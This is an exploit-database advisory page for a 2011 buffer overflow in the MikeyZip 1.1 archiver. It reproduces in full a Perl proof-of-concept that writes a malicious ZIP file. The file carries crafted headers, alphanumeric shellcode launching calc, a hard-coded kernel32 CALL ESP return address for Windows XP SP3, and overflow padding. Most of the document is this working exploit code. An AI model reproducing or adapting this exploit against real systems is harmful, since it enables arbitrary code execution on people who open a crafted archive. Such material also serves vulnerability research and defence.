MikeyZip 1.1 .ZIP File Buffer Overflow

vendor:

MikeyZip

by:

C4SS!0 G0M3S

9.3

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name: MikeyZip

Affected Version From: 1.1

Affected Version To: 1.1

Patch Exists: YES

Related CWE: N/A

CPE: a:mikeyzip:mikeyzip:1.1

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: WIN-XP SP3 Brazil Portuguese

2011

MikeyZip 1.1 .ZIP File Buffer Overflow

MikeyZip 1.1 is vulnerable to a buffer overflow vulnerability when handling specially crafted .ZIP files. An attacker can exploit this vulnerability to execute arbitrary code in the context of the application. The vulnerability exists due to a boundary error when handling .ZIP files. A specially crafted .ZIP file can cause a buffer overflow, which can be exploited to execute arbitrary code. The vulnerability is triggered when the application opens a specially crafted .ZIP file.

Mitigation:

Upgrade to the latest version of MikeyZip 1.1 or apply the patch provided by the vendor.

Source

Exploit-DB raw data:

#!/usr/bin/perl
#
#
#[+]Exploit Title: MikeyZip 1.1 .ZIP File Buffer Overflow
#[+]Date: 10\04\2011
#[+]Author: C4SS!0 G0M3S
#[+]Software Link: http://www.softpedia.com/get/Compression-tools/MikeyZip.shtml
#[+]Version: 1.1
#[+]Tested On: WIN-XP SP3 Brazil Portuguese
#[+]CVE: N/A
#
#
#

use strict;
use warnings;

my $filename = "Exploit.zip";
print "\n\n\t\tMikeyZip 1.1 .ZIP File Buffer Overflow\n";
print "\t\tCreated by C4SS!0 G0M3S\n";
print "\t\tE-mail Louredo_\@hotmail.com\n";
print "\t\tSite www.exploit-br.org/\n\n";

print "\n\n[+] Creting ZIP File...\n";
sleep(1);
my $head = "\x50\x4B\x03\x04\x14\x00\x00".
"\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00" .
"\x00\x00\x00\x00\x00\x00\x00\x00" .
"\xe4\x0f" .
"\x00\x00\x00";

my $head2 = "\x50\x4B\x01\x02\x14\x00\x14".
"\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00" .
"\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\xe4\x0f".
"\x00\x00\x00\x00\x00\x00\x01\x00".
"\x24\x00\x00\x00\x00\x00\x00\x00";

my $head3 = "\x50\x4B\x05\x06\x00\x00\x00".
"\x00\x01\x00\x01\x00".
"\x12\x10\x00\x00".
"\x02\x10\x00\x00".
"\x00\x00";
#
#LITTLE SHELLCODE WinExec("calc",0)
#
my $payload = 
"JJJJJJJJJJJRYVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJI03YP0PSXU3512LCSPTPXF0".
"ONTMGUMVSLKON6A";
$payload .= "\x41" x (238-length($payload));
$payload .= pack('V',0x774D3E78);#CALL ESP on kernel32.dll WINX-XP SP3
$payload .= "\x61" x 10;#6 x POPAD
$payload .= "\x98\xe3";#CALL EDX



$payload .= "\x41" x (4064-length($payload));
$payload = $payload.".txt";

my $zip = $head.$payload.$head2.$payload.$head3;
open(FILE,">file.zip") || die "[-]Error:\n$!\n";
print FILE $zip;
close(FILE);
print "[+] ZIP File Created With Sucess:)\n";
sleep(3);